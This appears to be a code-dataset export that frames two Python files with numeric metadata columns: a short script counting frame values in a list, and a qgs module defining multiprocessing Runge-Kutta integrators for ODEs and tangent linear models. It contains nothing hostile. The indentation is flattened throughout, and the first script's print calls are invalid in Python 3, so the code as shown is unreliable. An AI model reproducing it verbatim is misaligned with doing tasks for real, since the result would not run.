| 0.430936
| 76,176
| 2,004
| 224
| 38.011976
| 0.773628
| 0.008349
| 0
| 0.776365
| 0
| 0.005299
| 0.055201
| 0.010419
| 0
| 0
| 0.000053
| 0
| 0.006889
| 0
| null | null | 0
| 0.009009
| null | null | 0.00053
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
162277c9245c28e0a476f2ea41f453d2b3f62eef
| 2,005
|
py
|
Python
|
python/videoFrameAnalyse.py
|
bodhisatan/video_codec_evaluation
|
ad0560de0dd02732d1a0b7a24da988dfca9f5757
|
[
"Apache-2.0"
] | 1
|
2021-06-18T01:57:56.000Z
|
2021-06-18T01:57:56.000Z
|
python/videoFrameAnalyse.py
|
bodhisatan/video_codec_evaluation
|
ad0560de0dd02732d1a0b7a24da988dfca9f5757
|
[
"Apache-2.0"
] | null | null | null |
python/videoFrameAnalyse.py
|
bodhisatan/video_codec_evaluation
|
ad0560de0dd02732d1a0b7a24da988dfca9f5757
|
[
"Apache-2.0"
] | 1
|
2020-09-01T02:55:27.000Z
|
2020-09-01T02:55:27.000Z
|
s=[1, 1, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 2, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0]
j=0
for i in range(len(s)):
if s[i] > 1:
j=j+1
print("%d, %d") % ( i, s[i])
print("count: %d") % (j)
| 182.272727
| 1,895
| 0.338653
| 657
| 2,005
| 1.033486
| 0.021309
| 1.083947
| 1.608247
| 2.126657
| 0.920471
| 0.920471
| 0.920471
| 0.920471
| 0.920471
| 0.920471
| 0
| 0.471025
| 0.328678
| 2,005
| 10
| 1,896
| 200.5
| 0.033432
| 0
| 0
| 0
| 0
| 0
| 0.007481
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.285714
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
166b938a39e3a0a9c0229f347e1c2c2558a28529
| 54,156
|
py
|
Python
|
integrators/integrator.py
|
sadielbartholomew/qgs
|
1efe460a91fd0d8a3318d6c9156a56621b004151
|
[
"MIT"
] | null | null | null |
integrators/integrator.py
|
sadielbartholomew/qgs
|
1efe460a91fd0d8a3318d6c9156a56621b004151
|
[
"MIT"
] | null | null | null |
integrators/integrator.py
|
sadielbartholomew/qgs
|
1efe460a91fd0d8a3318d6c9156a56621b004151
|
[
"MIT"
] | null | null | null |
"""
Integrator module
=================
Module with the classes of integrators to multi-thread the integration of
an ordinary differential equations
.. math:: \dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})
of the model and its linearized version.
Module classes
--------------
* :class:`RungeKuttaIntegrator`
* :class:`RungeKuttaTglsIntegrator`
"""
import multiprocessing
import numpy as np
from numba import njit
from integrators.integrate import _integrate_runge_kutta_jit, _integrate_runge_kutta_tgls_jit, _zeros_func
from functions.util import reverse
class RungeKuttaIntegrator(object):
"""Class to integrate the ordinary differential equations (ODEs)
.. math:: \dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})
with a set of :class:`TrajectoryProcess` and a specified `Runge-Kutta method`_.
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
Parameters
----------
num_threads: None or int, optional
Number of :class:`TrajectoryProcess` workers (threads) to use. If `None`, use the number of machine's
cores available. Default to `None`.
b: None or ~numpy.ndarray, optional
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
If `None`, use the classic RK4 method coefficients. Default to `None`.
c: None or ~numpy.ndarray, optional
Matrix of coefficients :math:`c_{i,j}` of the `Runge-Kutta method`_ .
If `None`, use the classic RK4 method coefficients. Default to `None`.
a: None or ~numpy.ndarray, optional
Vector of coefficients :math:`a_i` of the `Runge-Kutta method`_ .
If `None`, use the classic RK4 method coefficients. Default to `None`.
number_of_dimensions: None or int, optional
Allow to hardcode the dynamical system dimension. If `None`, evaluate the dimension from the
callable :attr:`func`. Default to `None`.
Attributes
----------
num_threads: int
Number of :class:`TrajectoryProcess` workers (threads) to use.
b: ~numpy.ndarray
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
c: ~numpy.ndarray
Matrix of coefficients :math:`c_{i,j}` of the `Runge-Kutta method`_ .
a: ~numpy.ndarray
Vector of coefficients :math:`a_i` of the `Runge-Kutta method`_ .
n_dim: int
Dynamical system dimension.
n_traj: int
The number of trajectories (initial conditions) computed at the last integration
performed by the integrator.
n_records: int
The number of saved states of the last integration performed by the integrator.
ic: ~numpy.ndarray
Store the integrator initial conditions.
time: ~numpy.ndarray
The time at which the state of the system was saved. Array of shape (`n_records`,).
recorded_traj: ~numpy.ndarray
Saved states of the ODEs. 3D array of shape (`n_traj`, `n_dim`, `n_records`).
func: callable
Last function :math:`\\boldsymbol{f}` used by the integrator to integrate.
"""
def __init__(self, num_threads=None, b=None, c=None, a=None, number_of_dimensions=None):
if num_threads is None:
self.num_threads = multiprocessing.cpu_count()
else:
self.num_threads = num_threads
# Default is RK4
if a is None and b is None and c is None:
self.c = np.array([0., 0.5, 0.5, 1.])
self.b = np.array([1./6, 1./3, 1./3, 1./6])
self.a = np.zeros((len(self.c), len(self.b)))
self.a[1, 0] = 0.5
self.a[2, 1] = 0.5
self.a[3, 2] = 1.
else:
self.a = a
self.b = b
self.c = c
self.ic = None
self.time = None
self.recorded_traj = None
self.n_traj = 0
self.n_dim = number_of_dimensions
self.n_records = 0
self._write_steps = 0
self._time_direction = 1
self.func = None
self._ics_queue = None
self._traj_queue = None
self._processes_list = list()
def terminate(self):
"""Stop the workers (threads) and release the resources of the integrator."""
for process in self._processes_list:
process.terminate()
process.join()
def start(self):
"""Start or restart the workers (threads) of the integrator.
Warnings
--------
If the integrator was not previously terminated, it will be terminated first in the case
of a restart.
"""
self.terminate()
self._processes_list = list()
self._ics_queue = multiprocessing.JoinableQueue()
self._traj_queue = multiprocessing.Queue()
for i in range(self.num_threads):
self._processes_list.append(TrajectoryProcess(i, self.func, self.b, self.c, self.a,
self._ics_queue, self._traj_queue))
for process in self._processes_list:
process.daemon = True
process.start()
def set_func(self, f, ic_init=True):
"""Set the `Numba`_-jitted function :math:`\\boldsymbol{f}` to integrate.
.. _Numba: https://numba.pydata.org/
Parameters
----------
f: callable
The `Numba`_-jitted function :math:`\\boldsymbol{f}`.
Should have the signature ``f(t, x)`` where ``x`` is the state value and ``t`` is the time.
ic_init: bool, optional
Re-initialize or not the initial conditions of the integrator. Default to `True`.
Warnings
--------
This function restarts the integrator!
"""
self.func = f
if ic_init:
self.ic = None
self.start()
def set_bca(self, b=None, c=None, a=None, ic_init=True):
"""Set the coefficients of the `Runge-Kutta method`_ and restart the integrator. s
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
Parameters
----------
b: None or ~numpy.ndarray, optional
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
If `None`, does not reinitialize these coefficients.
c: None or ~numpy.ndarray, optional
Matrix of coefficients :math:`c_{i,j}` of the `Runge-Kutta method`_ .
If `None`, does not reinitialize these coefficients.
a: None or ~numpy.ndarray, optional
Vector of coefficients :math:`a_i` of the `Runge-Kutta method`_ .
If `None`, does not reinitialize these coefficients.
ic_init: bool, optional
Re-initialize or not the initial conditions of the integrator. Default to `True`.
"""
if a is not None:
self.a = a
if b is not None:
self.b = b
if c is not None:
self.c = c
if ic_init:
self.ic = None
self.start()
def initialize(self, convergence_time, dt, pert_size=0.01, reconvergence_time=None, forward=True,
number_of_trajectories=1, ic=None, reconverge=False):
"""Initialize the integration on an attractor by running it for a transient time,
For an ensemble of initial conditions, can do the same transient time for each, or the
`convergence_time` for the first one, and a smaller `reconvergence_time` for the subsequent ones.
This results into initial conditions on the attractor, stored in :attr:`ic`.
Parameters
----------
convergence_time: float
Transient time needed to converge to the attractor.
dt: float
Timestep of the transient integration.
pert_size:float, optional
If the reconvergence is activated, size of the perturbation to add to the previous ic to find
the next one. Default to 0.01 .
reconvergence_time: None or float, optional
Transient time for the subsequent trajectories after the first long `transient_time`.
forward: bool, optional
Whether to integrate the ODEs forward or backward in time. In case of backward integration, the
initial condition `ic` becomes a final condition. Default to forward integration.
number_of_trajectories: int
Number of initial conditions to find. Default to 1. Inactive if `ic` is provided.
ic: None or ~numpy.ndarray(float), optional
Initial condition of the system. Can be a 1D or a 2D array:
* 1D: Provide a single initial condition.
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Provide an ensemble of initial condition.
Should be of shape (`n_traj`, `n_dim`) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`,
and where `n_traj` is the number of initial conditions.
If `None`, use `number_trajectories` random initial conditions. Default to `None`.
reconverge: bool
Use or not the smaller transient time reconvergence with a perturbation
after the first initial conditions have been computed. If activated, only use the :attr:`num_threads`
first initial conditions of the `ic` arguments. Default to `False`.
"""
if reconverge is None:
reconverge = False
if ic is None:
if self.n_dim is not None:
i = self.n_dim
else:
i = 1
while True:
self.ic = np.zeros(i)
try:
x = self.func(0., self.ic)
except:
i += 1
else:
break
i = len(self.func(0., self.ic))
if number_of_trajectories > self.num_threads:
reconverge = True
tmp_ic = np.zeros((number_of_trajectories, i))
tmp_ic[:self.num_threads] = np.random.randn(self.num_threads, i)
else:
tmp_ic = np.random.randn(number_of_trajectories, i)
else:
tmp_ic = ic.copy()
if len(tmp_ic.shape) > 1:
number_of_trajectories = tmp_ic.shape[0]
if reconverge and reconvergence_time is not None:
self.integrate(0., convergence_time, dt, ic=tmp_ic[:self.num_threads], write_steps=0, forward=forward)
t, x = self.get_trajectories()
tmp_ic[:self.num_threads] = x
if number_of_trajectories - self.num_threads > self.num_threads:
next_len = self.num_threads
else:
next_len = number_of_trajectories - self.num_threads
index = self.num_threads
while True:
perturbation = pert_size * np.random.randn(next_len, x.shape[1])
self.integrate(0., reconvergence_time, dt, ic=x[:next_len]+perturbation, write_steps=0, forward=forward)
t, x = self.get_trajectories()
tmp_ic[index:index+next_len] = x
index += next_len
if number_of_trajectories - index > self.num_threads:
next_len = self.num_threads
else:
next_len = number_of_trajectories - index
if next_len <= 0:
break
self.ic = tmp_ic
else:
self.integrate(0., convergence_time, dt, ic=tmp_ic, write_steps=0, forward=forward)
t, x = self.get_trajectories()
self.ic = x
def integrate(self, t0, t, dt, ic=None, forward=True, write_steps=1):
"""Integrate the ordinary differential equations (ODEs)
.. math:: \dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})
with a specified `Runge-Kutta method`_ and workers. The function :math:`\\boldsymbol{f}` is the `Numba`_ jitted
function stored in :attr:`func`. The result of the integration can be obtained afterward by calling
:meth:`get_trajectories`.
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
.. _Numba: https://numba.pydata.org/
Parameters
----------
t0: float
Initial time of the time integration. Corresponds to the initial condition's `ic` time.
Important if the ODEs are non-autonomous.
t: float
Final time of the time integration. Corresponds to the final condition.
Important if the ODEs are non-autonomous.
dt: float
Timestep of the integration.
ic: None or ~numpy.ndarray(float), optional
Initial condition of the system. Can be a 1D or a 2D array:
* 1D: Provide a single initial condition.
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Provide an ensemble of initial condition.
Should be of shape (`n_traj`, `n_dim`) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`,
and where `n_traj` is the number of initial conditions.
If `None`, use the initial conditions stored in :attr:`ic`.
If then :attr:`ic` is `None`, use a zero initial condition.
Default to `None`.
forward: bool, optional
Whether to integrate the ODEs forward or backward in time. In case of backward integration, the
initial condition `ic` becomes a final condition. Default to forward integration.
write_steps: int, optional
Save the state of the integration in memory every `write_steps` steps. The other intermediary
steps are lost. It determine the size of the returned objects. Default is 1.
Set to 0 to return only the final state.
"""
if self.func is None:
print('No function to integrate defined!')
return 0
if ic is None:
if self.ic is None:
if self.n_dim is not None:
i = self.n_dim
else:
i = 1
while True:
self.ic = np.zeros(i)
try:
x = self.func(0., self.ic)
except:
i += 1
else:
break
i = len(self.func(0., self.ic))
self.ic = np.zeros(i)
else:
self.ic = ic
if len(self.ic.shape) == 1:
self.ic = self.ic.reshape((1, -1))
self.n_traj = self.ic.shape[0]
self.n_dim = self.ic.shape[1]
self.time = np.concatenate((np.arange(t0, t, dt), np.full((1,), t)))
self._write_steps = write_steps
if forward:
self._time_direction = 1
else:
self._time_direction = -1
if write_steps == 0:
self.n_records = 1
else:
tot = self.time[::self._write_steps]
self.n_records = len(tot)
if tot[-1] != self.time[-1]:
self.n_records += 1
self.recorded_traj = np.zeros((self.n_traj, self.n_dim, self.n_records))
for i in range(self.n_traj):
self._ics_queue.put((i, self.time, self.ic[i], self._time_direction, self._write_steps))
self._ics_queue.join()
for i in range(self.n_traj):
args = self._traj_queue.get()
self.recorded_traj[args[0]] = args[1]
def get_trajectories(self):
"""Returns the result of the previous integrator integration.
Returns
-------
time, traj: ~numpy.ndarray
The result of the integration:
* `time` is the time at which the state of the system was saved. Array of shape (:attr:`n_records`,).
* `traj` are the saved states. 3D array of shape (:attr:`n_traj`, :attr:`n_dim`, :attr:`n_records`).
If :attr:`n_traj` = 1, a 2D array of shape (:attr:`n_dim`, :attr:`n_steps`) is returned instead.
"""
if self._write_steps > 0:
if self._time_direction == 1:
if self.time[::self._write_steps][-1] == self.time[-1]:
return self.time[::self._write_steps], np.squeeze(self.recorded_traj)
else:
return np.concatenate((self.time[::self._write_steps], np.full((1,), self.time[-1]))), \
np.squeeze(self.recorded_traj)
else:
rtime = reverse(self.time[::-self._write_steps])
if rtime[0] == self.time[0]:
return rtime, np.squeeze(self.recorded_traj)
else:
return np.concatenate((np.full((1,), self.time[0]), rtime)), np.squeeze(self.recorded_traj)
else:
return self.time[-1], np.squeeze(self.recorded_traj)
def get_ic(self):
"""Returns the initial conditions stored in the integrator.
Returns
-------
~numpy.ndarray
The initial conditions.
"""
return self.ic
def set_ic(self, ic):
"""Direct setter for the integrator's initial conditions
Parameters
----------
ic: ~numpy.ndarray(float)
Initial condition of the system. Can be a 1D or a 2D array:
* 1D: Provide a single initial condition.
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Provide an ensemble of initial condition.
Should be of shape (`n_traj`, `n_dim`) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`,
and where `n_traj` is the number of initial conditions.
"""
self.ic = ic
class TrajectoryProcess(multiprocessing.Process):
""":class:`RungeKuttaIntegrator`'s workers class. Allows to multi-thread time integration.
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
.. _Numba: https://numba.pydata.org/
Parameters
----------
processID: int
Number identifying the worker.
func: callable
`Numba`_-jitted function to integrate assigned to the worker.
b: ~numpy.ndarray, optional
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
c: ~numpy.ndarray, optional
Matrix of coefficients :math:`c_{i,j}` of the `Runge-Kutta method`_ .
a: or ~numpy.ndarray, optional
Vector of coefficients :math:`a_i` of the `Runge-Kutta method`_ .
ics_queue: multiprocessing.JoinableQueue
Queue to which the worker ask for initial conditions input.
traj_queue: multiprocessing.Queue
Queue to which the worker returns the integration results.
Attributes
----------
processID: int
Number identifying the worker.
func: callable
`Numba`_-jitted function to integrate assigned to the worker.
b: ~numpy.ndarray
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
c: ~numpy.ndarray
Matrix of coefficients :math:`c_{i,j}` of the `Runge-Kutta method`_ .
a: ~numpy.ndarray
Vector of coefficients :math:`a_i` of the `Runge-Kutta method`_ .
ics_queue: multiprocessing.JoinableQueue
Queue to which the worker ask for initial conditions input.
traj_queue: multiprocessing.Queue
Queue to which the worker returns the integration results.
"""
def __init__(self, processID, func, b, c, a, ics_queue, traj_queue):
super().__init__()
self.processID = processID
self.ics_queue = ics_queue
self.traj_queue = traj_queue
self.func = func
self.a = a
self.b = b
self.c = c
def run(self):
"""Main worker computing routine. Perform the time integration with the fetched initial conditons."""
while True:
args = self.ics_queue.get()
recorded_traj = _integrate_runge_kutta_jit(self.func, args[1], args[2][np.newaxis, :], args[3], args[4],
self.b, self.c, self.a)
self.traj_queue.put((args[0], recorded_traj))
self.ics_queue.task_done()
class RungeKuttaTglsIntegrator(object):
"""Class to integrate simultaneously the ordinary differential equations (ODEs)
.. math:: \dot{\\boldsymbol{x}} = \\boldsymbol{f}(t, \\boldsymbol{x})
and its tangent linear model, i.e. the linearized ODEs
.. math :: \dot{\\boldsymbol{\delta x}} = \\boldsymbol{\mathrm{J}}(t, \\boldsymbol{x}) \cdot \\boldsymbol{\delta x}
where :math:`\\boldsymbol{\mathrm{J}} = \\frac{\partial \\boldsymbol{f}}{\partial \\boldsymbol{x}}` is the
Jacobian matrix of :math:`\\boldsymbol{f}`, with a specified `Runge-Kutta method`_.
To solve this equation, one has to integrate simultaneously both ODEs. This class does so with a set
of :class:`TglsTrajectoryProcess` workers.
The function :math:`\\boldsymbol{f}` and :math:`\\boldsymbol{J}` should
be `Numba`_ jitted functions. These functions must have a signature ``f(t, x)`` and ``J(t, x)`` where ``x`` is
the state value and ``t`` is the time.
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
.. _Numba: https://numba.pydata.org/
.. _fundamental matrix of solutions: https://en.wikipedia.org/wiki/Fundamental_matrix_(linear_differential_equation)
Parameters
----------
num_threads: None or int, optional
Number of :class:`TrajectoryProcess` workers (threads) to use. If `None`, use the number of machine's
cores available. Default to `None`.
b: None or ~numpy.ndarray, optional
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
If `None`, use the classic RK4 method coefficients. Default to `None`.
c: None or ~numpy.ndarray, optional
Matrix of coefficients :math:`c_{i,j}` of the `Runge-Kutta method`_ .
If `None`, use the classic RK4 method coefficients. Default to `None`.
a: None or ~numpy.ndarray, optional
Vector of coefficients :math:`a_i` of the `Runge-Kutta method`_ .
If `None`, use the classic RK4 method coefficients. Default to `None`.
number_of_dimensions: None or int, optional
Allow to hardcode the dynamical system dimension. If `None`, evaluate the dimension from the
callable :attr:`func`. Default to `None`.
Attributes
----------
num_threads: int
Number of :class:`TrajectoryProcess` workers (threads) to use.
b: ~numpy.ndarray
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
c: ~numpy.ndarray
Matrix of coefficients :math:`c_{i,j}` of the `Runge-Kutta method`_ .
a: ~numpy.ndarray
Vector of coefficients :math:`a_i` of the `Runge-Kutta method`_ .
n_dim: int
Dynamical system dimension.
n_traj: int
The number of trajectories (initial conditions) of the non-linear ODEs computed at the last integration
performed by the integrator.
n_tgtraj: int
The number of trajectories (initial conditions) the linear ODEs computed at the last integration
performed by the integrator.
n_records: int
The number of saved states of the last integration performed by the integrator.
ic: ~numpy.ndarray
Store the integrator non-linear ODEs initial conditions.
tg_ic: ~numpy.ndarray
Store the integrator linear ODEs initial conditions.
time: ~numpy.ndarray
The time at which the state of the system was saved. Array of shape (`n_records`,).
recorded_traj: ~numpy.ndarray
Saved states of the ODEs. 3D array of shape (:attr:`n_traj`, :attr:`n_dim`, :attr:`n_records`).
recorded_fmatrix: ~numpy.ndarray
Saved states of the linear ODEs. 4D array of shape (:attr:`n_traj`, :attr:`n_tg_traj`, :attr:`n_dim`, :attr:`n_records`).
func: callable
Last function :math:`\\boldsymbol{f}` used by the integrator to integrate.
func_jac: callable
Last Jacobian matrix function :math:`\\boldsymbol{J}` used by the integrator to integrate.
"""
def __init__(self, num_threads=None, b=None, c=None, a=None, number_of_dimensions=None):
if num_threads is None:
self.num_threads = multiprocessing.cpu_count()
else:
self.num_threads = num_threads
# Default is RK4
if a is None and b is None and c is None:
self.c = np.array([0., 0.5, 0.5, 1.])
self.b = np.array([1./6, 1./3, 1./3, 1./6])
self.a = np.zeros((len(self.c), len(self.b)))
self.a[1, 0] = 0.5
self.a[2, 1] = 0.5
self.a[3, 2] = 1.
else:
self.a = a
self.b = b
self.c = c
self.ic = None
self.tg_ic = None
self.time = None
self.recorded_traj = None
self.recorded_fmatrix = None
self.n_traj = 0
self.n_tgtraj = 0
self.n_dim = number_of_dimensions
self.n_records = 0
self._write_steps = 0
self._time_direction = 1
self._adjoint = False
self._boundary = None
self._inverse = 1.
self.func = None
self.func_jac = None
self._ics_queue = None
self._traj_queue = None
self._processes_list = list()
def terminate(self):
"""Stop the workers (threads) and release the resources of the integrator."""
for process in self._processes_list:
process.terminate()
process.join()
def start(self):
"""Start or restart the workers (threads) of the integrator.
Warnings
--------
If the integrator was not previously terminated, it will be terminated first in the case
of a restart.
"""
self.terminate()
self._processes_list = list()
self._ics_queue = multiprocessing.JoinableQueue()
self._traj_queue = multiprocessing.Queue()
for i in range(self.num_threads):
self._processes_list.append(TglsTrajectoryProcess(i, self.func, self.func_jac, self.b, self.c, self.a,
self._ics_queue, self._traj_queue))
for process in self._processes_list:
process.daemon = True
process.start()
def set_func(self, f, fjac, ic_init=True):
"""Set the `Numba`_-jitted function :math:`\\boldsymbol{f}` and Jacobian matrix function
:math:`\\boldsymbol{\mathrm{J}}` to integrate.
.. _Numba: https://numba.pydata.org/
Parameters
----------
f: callable
The `Numba`_-jitted function :math:`\\boldsymbol{f}`.
Should have the signature ``f(t, x)`` where ``x`` is the state value and ``t`` is the time.
fjac: callable
The `Numba`_-jitted Jacobian matrix function :math:`\\boldsymbol{J}`.
Should have the signature ``J(t, x)`` where ``x`` is the state value and ``t`` is the time.
ic_init: bool, optional
Re-initialize or not the initial conditions of the integrator. Default to `True`.
Warnings
--------
This function restarts the integrator!
"""
self.func = f
self.func_jac = fjac
if ic_init:
self.ic = None
self.start()
def set_bca(self, b=None, c=None, a=None, ic_init=True):
"""Set the coefficients of the `Runge-Kutta method`_ and restart the integrator. s
.. _Runge-Kutta method: https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods
Parameters
----------
b: None or ~numpy.ndarray, optional
Vector of coefficients :math:`b_i` of the `Runge-Kutta method`_ .
If `None`, does not reinitialize these coefficients.
c: None or ~numpy.ndarray, optional
Matrix of coefficients :math:`c_{i,j}` of the `Runge-Kutta method`_ .
If `None`, does not reinitialize these coefficients.
a: None or ~numpy.ndarray, optional
Vector of coefficients :math:`a_i` of the `Runge-Kutta method`_ .
If `None`, does not reinitialize these coefficients.
ic_init: bool, optional
Re-initialize or not the initial conditions of the integrator. Default to `True`.
"""
if a is not None:
self.a = a
if b is not None:
self.b = b
if c is not None:
self.c = c
if ic_init:
self.ic = None
self.start()
def initialize(self, convergence_time, dt, pert_size=0.01, reconvergence_time=None, forward=True,
number_of_trajectories=1, ic=None, reconverge=None):
"""Initialize the integration on an attractor by running it for a transient time,
For an ensemble of initial conditions, can do the same transient time for each, or the
`convergence_time` for the first one, and a smaller `reconvergence_time` for the subsequent ones.
This results into initial conditions on the attractor, stored in :attr:`ic`.
Parameters
----------
convergence_time: float
Transient time needed to converge to the attractor.
dt: float
Timestep of the transient integration.
pert_size:float, optional
If the reconvergence is activated, size of the perturbation to add to the previous ic to find
the next one. Default to 0.01 .
reconvergence_time: None or float, optional
Transient time for the subsequent trajectories after the first long `transient_time`.
forward: bool, optional
If true, integrate the ODEs forward in time, else, integrate backward in time. In case of backward integration, the
initial condition `ic` becomes a final condition. Default to forward integration.
number_of_trajectories: int
Number of initial conditions to find. Default to 1. Inactive if `ic` is provided.
ic: None or ~numpy.ndarray(float), optional
Initial condition of the system. Can be a 1D or a 2D array:
* 1D: Provide a single initial condition.
Should be of shape (`n_dim`,) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`.
* 2D: Provide an ensemble of initial condition.
Should be of shape (`n_traj`, `n_dim`) where `n_dim` = :math:`\mathrm{dim}(\\boldsymbol{x})`,
and where `n_traj` is the number of initial conditions.
If `None`, use `number_trajectories` random initial conditions. Default to `None`.
reconverge: bool
Use or not the smaller transient time reconvergence with a perturbation
after the first initial conditions have been computed. If activated, only use the :attr:`num_threads`
first initial conditions of the `ic` arguments. Default to `False`.
"""
if reconverge is None:
reconverge = False
if ic is None:
if self.n_dim is not None:
i = self.n_dim
else:
i = 1
while True:
self.ic = np.zeros(i)
try:
x = self.func(0., self.ic)
except:
i += 1
else:
break
i = len(self.func(0., self.ic))
if number_of_trajectories > self.num_threads:
reconverge = True
tmp_ic = np.zeros((number_of_trajectories, i))
tmp_ic[:self.num_threads] = np.random.randn(self.num_threads, i)
else:
tmp_ic = np.random.randn(number_of_trajectories, i)
else:
tmp_ic = ic.copy()
if len(tmp_ic.shape) > 1:
number_of_trajectories = tmp_ic.shape[0]
if reconverge and reconvergence_time is not None:
self.integrate(0., convergence_time, dt, ic=tmp_ic[:self.num_threads], write_steps=0, forward=forward)
t, x, fm = self.get_trajectories()
tmp_ic[:self.num_threads] = x
if number_of_trajectories - self.num_threads > self.num_threads:
next_len = self.num_threads
else:
next_len = number_of_trajectories - self.num_threads
index = self.num_threads
while True:
perturbation = pert_size * np.random.randn(next_len, x.shape[1])
self.integrate(0., reconvergence_time, dt, ic=x[:next_len]+perturbation, write_steps=0, forward=forward)
t, x, fm = self.get_trajectories()
tmp_ic[index:index+next_len] = x
index += next_len
if number_of_trajectories - index > self.num_threads:
next_len = self.num_threads
else:
next_len = number_of_trajectories - index
if next_len <= 0:
break
self.ic = tmp_ic
else:
self.integrate(0., convergence_time, dt, ic=tmp_ic, write_steps=0, forward=forward)
t, x, fm = self.get_trajectories()
self.ic = x
